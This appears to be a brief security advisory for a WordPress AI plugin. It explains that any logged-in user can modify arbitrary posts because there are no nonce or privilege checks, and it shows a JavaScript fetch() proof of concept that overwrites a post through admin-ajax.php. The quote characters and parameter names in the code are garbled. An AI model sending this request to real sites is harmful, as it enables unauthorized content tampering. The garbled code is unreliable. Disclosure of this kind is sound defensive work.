The plugin does not perform any kind of nonce or privilege checks before letting logged-in users modify arbitrary posts.
fetch(βhttp://localhost/wp-admin/admin-ajax.phpβ, { method: βPOSTβ, headers: new Headers({ βContent-Typeβ: βapplication/x-www-form-urlencodedβ, }), body: βaction=wpaicg_set_post_content_&post;_id=1&content;=CHANGEDβ, redirect: βfollowβ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(βerrorβ, error));